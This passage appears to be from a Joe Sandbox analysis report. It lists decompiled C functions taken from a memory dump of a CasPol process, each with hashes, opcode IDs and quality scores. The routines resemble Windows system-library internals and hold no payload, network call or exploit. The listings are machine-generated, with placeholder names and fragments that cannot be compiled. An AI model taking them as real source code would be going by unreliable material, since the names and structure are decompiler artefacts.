                                                                                                                                                                                                                                                                                                					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                                                				_push( &_v72);
                                                                                                                                                                                                                                                                                                				_push(0x14);
                                                                                                                                                                                                                                                                                                				_push(0x20402);
                                                                                                                                                                                                                                                                                                				return L0176B640(E01769AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31,  *_t18 & 0x000000ff);
                                                                                                                                                                                                                                                                                                			}

















                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 0ac4cf84011854617aed3892cf328d1b230ec6bd5d95a09d69e3dca45161dbcb
                                                                                                                                                                                                                                                                                                • Instruction ID: 90f610716756d5d5324b5d62982de7cb78ba5c0762b2e9e0225e05e4ab5a36f3
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0ac4cf84011854617aed3892cf328d1b230ec6bd5d95a09d69e3dca45161dbcb
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5B012C71A0021DAFCB04DFA9D9459AEFBB8EF58310F10405AFA04E7341EB34AA00CBA1
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                			E0172DB60(intOrPtr* __ecx) {
                                                                                                                                                                                                                                                                                                				intOrPtr* _t9;
                                                                                                                                                                                                                                                                                                				void* _t12;
                                                                                                                                                                                                                                                                                                				void* _t13;
                                                                                                                                                                                                                                                                                                				intOrPtr _t14;
                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                				_t9 = __ecx;
                                                                                                                                                                                                                                                                                                				_t14 = 0;
                                                                                                                                                                                                                                                                                                				if(__ecx == 0 ||  *__ecx != 0) {
                                                                                                                                                                                                                                                                                                					_t13 = 0xc000000d;
                                                                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                                                                					_t14 = E0172DB40();
                                                                                                                                                                                                                                                                                                					if(_t14 == 0) {
                                                                                                                                                                                                                                                                                                						_t13 = 0xc0000017;
                                                                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                                                                						_t13 = L0172E7B0(__ecx, _t12, _t14, 0xfff);
                                                                                                                                                                                                                                                                                                						if(_t13 < 0) {
                                                                                                                                                                                                                                                                                                							L0172E8B0(__ecx, _t14, 0xfff);
                                                                                                                                                                                                                                                                                                							L017477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
                                                                                                                                                                                                                                                                                                							_t14 = 0;
                                                                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                                                                							_t13 = 0;
                                                                                                                                                                                                                                                                                                							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
                                                                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                                                				 *_t9 = _t14;
                                                                                                                                                                                                                                                                                                				return _t13;
                                                                                                                                                                                                                                                                                                			}








                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                                                                                                                                                                                                                                                                • Instruction ID: 0cb4341fdc1936779609a73bbd3e81722c1901b6acaaed4dd66b93c74bcd620f
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 69F09C332455339BD7336AD9C8A4F57FA969FD2A60F150475F2059B348CE608C0396D1
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                			E0172B1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
                                                                                                                                                                                                                                                                                                				signed char* _t13;
                                                                                                                                                                                                                                                                                                				intOrPtr _t22;
                                                                                                                                                                                                                                                                                                				char _t23;
                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                				_t23 = __edx;
                                                                                                                                                                                                                                                                                                				_t22 = __ecx;
                                                                                                                                                                                                                                                                                                				if(E01747D50() != 0) {
                                                                                                                                                                                                                                                                                                					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
                                                                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                                                                					_t13 = 0x7ffe0384;
                                                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                                                				if( *_t13 != 0) {
                                                                                                                                                                                                                                                                                                					_t13 =  *[fs:0x30];
                                                                                                                                                                                                                                                                                                					if((_t13[0x240] & 0x00000004) == 0) {
                                                                                                                                                                                                                                                                                                						goto L3;
                                                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                                                					if(E01747D50() == 0) {
                                                                                                                                                                                                                                                                                                						_t13 = 0x7ffe0385;
                                                                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                                                                						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
                                                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                                                					if(( *_t13 & 0x00000020) == 0) {
                                                                                                                                                                                                                                                                                                						goto L3;
                                                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                                                					return E017A7016(0x14a4, _t22, _t23, _a4, _a8, 0);
                                                                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                                                                					L3:
                                                                                                                                                                                                                                                                                                					return _t13;
                                                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                                                			}







                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                                                                                                                                                                                                                                                                • Instruction ID: 6ae7a85365034bf8c0e1d94e9413c90a60afebbb6ec2eec5ea44e1d89abbe05a
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 22014432240680DBD322A76DC808F6AFBD8EF92350F0904A1FA058B2B2D7B8C900C315
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                C-Code - Quality: 73%
                                                                                                                                                                                                                                                                                                			E017E131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                                                                				intOrPtr _v12;
                                                                                                                                                                                                                                                                                                				intOrPtr _v16;
                                                                                                                                                                                                                                                                                                				intOrPtr _v20;
                                                                                                                                                                                                                                                                                                				intOrPtr _v24;
                                                                                                                                                                                                                                                                                                				short _v50;
                                                                                                                                                                                                                                                                                                				char _v56;
                                                                                                                                                                                                                                                                                                				signed char* _t18;
                                                                                                                                                                                                                                                                                                				void* _t24;
                                                                                                                                                                                                                                                                                                				void* _t30;
                                                                                                                                                                                                                                                                                                				void* _t31;
                                                                                                                                                                                                                                                                                                				signed int _t32;
                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                				_t29 = __edx;
                                                                                                                                                                                                                                                                                                				_v8 =  *0x181d360 ^ _t32;
                                                                                                                                                                                                                                                                                                				_v20 = _a4;
                                                                                                                                                                                                                                                                                                				_v12 = _a8;
                                                                                                                                                                                                                                                                                                				_v24 = __ecx;
                                                                                                                                                                                                                                                                                                				_v16 = __edx;
                                                                                                                                                                                                                                                                                                				_v50 = 0x1021;
                                                                                                                                                                                                                                                                                                				if(E01747D50() == 0) {
                                                                                                                                                                                                                                                                                                					_t18 = 0x7ffe0380;
                                                                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                                                                					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                                                				_push( &_v56);
                                                                                                                                                                                                                                                                                                				_push(0x10);
                                                                                                                                                                                                                                                                                                				_push(0x20402);
                                                                                                                                                                                                                                                                                                				return L0176B640(E01769AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31,  *_t18 & 0x000000ff);
                                                                                                                                                                                                                                                                                                			}
















Memory Dump Source
• Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 92c37059f0c0be466c32f4460995899965ab0f0d9e1f5e01cc8813114d4ababd
• Instruction ID: 20e2a324dcc9c57a677988765cefd8107d09bca14326d85275875663d66bd411
• Opcode Fuzzy Hash: 92c37059f0c0be466c32f4460995899965ab0f0d9e1f5e01cc8813114d4ababd
• Instruction Fuzzy Hash: E2013C71A01209AFCB04EFA9D549AAEF7F8FF18700F508059FD45EB381EA349A00CB54
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 100%
E0174C577(void* __ecx, char _a4) {
	void* __esi;
	void* __ebp;
	void* _t17;
	void* _t19;
	void* _t20;
	void* _t21;

	_t18 = __ecx;
	_t21 = __ecx;
	if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || L0174C5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x17011cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
		__eflags = _a4;
		if(__eflags != 0) {
			L10:
			E017F88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
			L9:
			return 0;
		}
		__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
		if(__eflags == 0) {
			goto L10;
		}
		goto L9;
	} else {
		return 1;
	}
}

Memory Dump Source
• Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b16115685e2aa704ec457ecf3d3c2480bd4387e8445d23ab97c983ba24aeba2b
• Instruction ID: 98e8a3af12cc9416dd4cae678cbecc0a8591e12be884397bcf26d3e8a108107d
• Opcode Fuzzy Hash: b16115685e2aa704ec457ecf3d3c2480bd4387e8445d23ab97c983ba24aeba2b
• Instruction Fuzzy Hash: 82F0B4B29176909FE737C71CC004B3AFFD49B05670F7484A7D51587242D7A4D880C2D1
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 68%
E017F8D34(intOrPtr __ecx, intOrPtr __edx) {
	signed int _v8;
	intOrPtr _v12;
	intOrPtr _v16;
	short _v42;
	char _v48;
	signed char* _t12;
	void* _t18;
	void* _t24;
	void* _t25;
	signed int _t26;

	_t23 = __edx;
	_v8 =  *0x181d360 ^ _t26;
	_v16 = __ecx;
	_v42 = 0x1c2b;
	_v12 = __edx;
	if(E01747D50() == 0) {
		_t12 = 0x7ffe0386;
	} else {
		_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
	}
	_push( &_v48);
	_push(8);
	_push(0x20402);
	return L0176B640(E01769AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25,  *_t12 & 0x000000ff);
}














                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 07504d858838fc33ed98a2076f05799c6b3b03cb3f39f64cbfb7f6728bda497f
                                                                                                                                                                                                                                                                                                • Instruction ID: eb90ff2f47e204f11104b947f49d2b44c73478affd27dace64db70cf098d81bd
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 07504d858838fc33ed98a2076f05799c6b3b03cb3f39f64cbfb7f6728bda497f
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D5F0B470A046089FDB14EFB8D445B6EF7B8EF18300F508099EA05EB380EA34DA00CB54
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                C-Code - Quality: 54%
                                                                                                                                                                                                                                                                                                			E0176927A(void* __ecx) {
                                                                                                                                                                                                                                                                                                				signed int _t11;
                                                                                                                                                                                                                                                                                                				void* _t14;
                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                				_t11 = L01744620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
                                                                                                                                                                                                                                                                                                				if(_t11 != 0) {
                                                                                                                                                                                                                                                                                                					E0176FA60(_t11, 0, 0x98);
                                                                                                                                                                                                                                                                                                					asm("movsd");
                                                                                                                                                                                                                                                                                                					asm("movsd");
                                                                                                                                                                                                                                                                                                					asm("movsd");
                                                                                                                                                                                                                                                                                                					asm("movsd");
                                                                                                                                                                                                                                                                                                					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
                                                                                                                                                                                                                                                                                                					 *((intOrPtr*)(_t11 + 0x24)) = 1;
                                                                                                                                                                                                                                                                                                					E017692C6(_t11, _t14);
                                                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                                                				return _t11;
                                                                                                                                                                                                                                                                                                			}






                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                                                                                                                                                                                                                                                                • Instruction ID: 5e74743c6da3ad96e865173dd58b3c038556f1bc34ebc3ddb6245d0f52ce0c4e
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8CE02B323405016FE7119E09DCC4F17B75DEF92724F004078FA001E242C6F5DD0887A0
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                C-Code - Quality: 89%
                                                                                                                                                                                                                                                                                                			E017E2073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
                                                                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                                                                				signed char _t3;
                                                                                                                                                                                                                                                                                                				signed char _t7;
                                                                                                                                                                                                                                                                                                				void* _t19;
                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                				_t17 = __ecx;
                                                                                                                                                                                                                                                                                                				_t3 = L017DFD22(__ecx);
                                                                                                                                                                                                                                                                                                				_t19 =  *0x181849c - _t3; // 0x0
                                                                                                                                                                                                                                                                                                				if(_t19 == 0) {
                                                                                                                                                                                                                                                                                                					__eflags = _t17 -  *0x1818748; // 0x0
                                                                                                                                                                                                                                                                                                					if(__eflags <= 0) {
                                                                                                                                                                                                                                                                                                						L017E1C06();
                                                                                                                                                                                                                                                                                                						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
                                                                                                                                                                                                                                                                                                						__eflags = _t3;
                                                                                                                                                                                                                                                                                                						if(_t3 != 0) {
                                                                                                                                                                                                                                                                                                							L5:
                                                                                                                                                                                                                                                                                                							__eflags =  *0x1818724 & 0x00000004;
                                                                                                                                                                                                                                                                                                							if(( *0x1818724 & 0x00000004) == 0) {
                                                                                                                                                                                                                                                                                                								asm("int3");
                                                                                                                                                                                                                                                                                                								return _t3;
                                                                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                                                                							_t3 =  *0x7ffe02d4 & 0x00000003;
                                                                                                                                                                                                                                                                                                							__eflags = _t3 - 3;
                                                                                                                                                                                                                                                                                                							if(_t3 == 3) {
                                                                                                                                                                                                                                                                                                								goto L5;
                                                                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                                                					return _t3;
                                                                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                                                                					_t7 =  *0x1818724; // 0x0
                                                                                                                                                                                                                                                                                                					_push( !_t7 >> 0x00000002 & 0x00000001);
                                                                                                                                                                                                                                                                                                					return L017D8DF1(__ebx, 0xc0000374, 0x1815890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001);
                                                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                                                			}








                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 65bec86a6a65b7840b7ddc208410f196984558abcf9df1a914dab4a50baa7ad5
                                                                                                                                                                                                                                                                                                • Instruction ID: cb90e6e35c00a7ba0c3c5268cdd862416582bda5db647f6a8e9c874cef14b1ce
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 65bec86a6a65b7840b7ddc208410f196984558abcf9df1a914dab4a50baa7ad5
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6DF0A06B8151894BDF326B28655A2E2AFEED79E110B490885D9A05728EC9348A93CF24
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                C-Code - Quality: 62%
                                                                                                                                                                                                                                                                                                			E017F8B58(intOrPtr __ecx) {
                                                                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                                                                				intOrPtr _v20;
                                                                                                                                                                                                                                                                                                				short _v46;
                                                                                                                                                                                                                                                                                                				char _v52;
                                                                                                                                                                                                                                                                                                				signed char* _t11;
                                                                                                                                                                                                                                                                                                				void* _t17;
                                                                                                                                                                                                                                                                                                				void* _t22;
                                                                                                                                                                                                                                                                                                				void* _t23;
                                                                                                                                                                                                                                                                                                				void* _t24;
                                                                                                                                                                                                                                                                                                				signed int _t25;
                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                				_v8 =  *0x181d360 ^ _t25;
                                                                                                                                                                                                                                                                                                				_v20 = __ecx;
                                                                                                                                                                                                                                                                                                				_v46 = 0x1c26;
                                                                                                                                                                                                                                                                                                				if(E01747D50() == 0) {
                                                                                                                                                                                                                                                                                                					_t11 = 0x7ffe0386;
                                                                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                                                                					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                                                				_push( &_v52);
                                                                                                                                                                                                                                                                                                				_push(4);
                                                                                                                                                                                                                                                                                                				_push(0x402);
                                                                                                                                                                                                                                                                                                				return L0176B640(E01769AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24,  *_t11 & 0x000000ff);
                                                                                                                                                                                                                                                                                                			}














                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 9ed4027311e5170e325add83085bff3670b568bb25f2727b03761def6adbe49f
                                                                                                                                                                                                                                                                                                • Instruction ID: 18de5d9333053d7132f5bc42046d03cb8a234284033ee95c5828a5422dfcf7ff
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9ed4027311e5170e325add83085bff3670b568bb25f2727b03761def6adbe49f
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 86F082B1A1425DAFDB14EBA8D90AE6FF7B8EF14300F440499BA05DB380EB34DA00C795
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                C-Code - Quality: 79%
                                                                                                                                                                                                                                                                                                			E0172F358(void* __ecx, signed int __edx) {
                                                                                                                                                                                                                                                                                                				char _v8;
                                                                                                                                                                                                                                                                                                				signed int _t9;
                                                                                                                                                                                                                                                                                                				void* _t20;
                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                				_push(__ecx);
                                                                                                                                                                                                                                                                                                				_t9 = 2;
                                                                                                                                                                                                                                                                                                				_t20 = 0;
                                                                                                                                                                                                                                                                                                				if(E0175F3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
                                                                                                                                                                                                                                                                                                					_t20 = L01744620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                                                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                                                				return _t20;
                                                                                                                                                                                                                                                                                                			}







                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                                                                                                                                                                                                                                                                • Instruction ID: aa311fb167e71ba264c61831a58b2039f137a8d4e043b7408fee1367271a3e97
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 17E0DF32A40128FBDB61AAD99E09FAAFFBCEB58AA0F000196FA04D7151D5709E00D2D1
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                C-Code - Quality: 82%
                                                                                                                                                                                                                                                                                                			E017B41E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                                                                                                                				void* _t5;
                                                                                                                                                                                                                                                                                                				void* _t14;
                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                				_push(8);
                                                                                                                                                                                                                                                                                                				_push(0x18008f0);
                                                                                                                                                                                                                                                                                                				_t5 = E0177D08C(__ebx, __edi, __esi);
                                                                                                                                                                                                                                                                                                				if( *0x18187ec == 0) {
                                                                                                                                                                                                                                                                                                					L0173EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                                                                                                                                                                                                                                                                					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
                                                                                                                                                                                                                                                                                                					if( *0x18187ec == 0) {
                                                                                                                                                                                                                                                                                                						 *0x18187f0 = 0x18187ec;
                                                                                                                                                                                                                                                                                                						 *0x18187ec = 0x18187ec;
                                                                                                                                                                                                                                                                                                						 *0x18187e8 = 0x18187e4;
                                                                                                                                                                                                                                                                                                						 *0x18187e4 = 0x18187e4;
                                                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                                                					 *(_t14 - 4) = 0xfffffffe;
                                                                                                                                                                                                                                                                                                					_t5 = L017B4248();
                                                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                                                				return E0177D0D1(_t5);
                                                                                                                                                                                                                                                                                                			}






                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: dd3dd442b2aa1adfc012d0a396c5570788d01c5c8ebc1383246117b76fecb556
                                                                                                                                                                                                                                                                                                • Instruction ID: af71ac2ad6f3b19a56a4ca458f9d4bd7ee250a581552aede7e26416edacf369b
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dd3dd442b2aa1adfc012d0a396c5570788d01c5c8ebc1383246117b76fecb556
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A9F03976851705CFCBB2EFA9D54AB94B6B8FB56311F00492A92028728EC73447A5DF11
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                			E017DD380(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                                                                                                                                                				void* _t5;
                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                				if(_a4 != 0) {
                                                                                                                                                                                                                                                                                                					_t5 = L0172E8B0(__ecx, _a4, 0xfff);
                                                                                                                                                                                                                                                                                                					L017477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                                                                                                                                                                                                                                                                                                					return _t5;
                                                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                                                				return 0xc000000d;
                                                                                                                                                                                                                                                                                                			}





                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
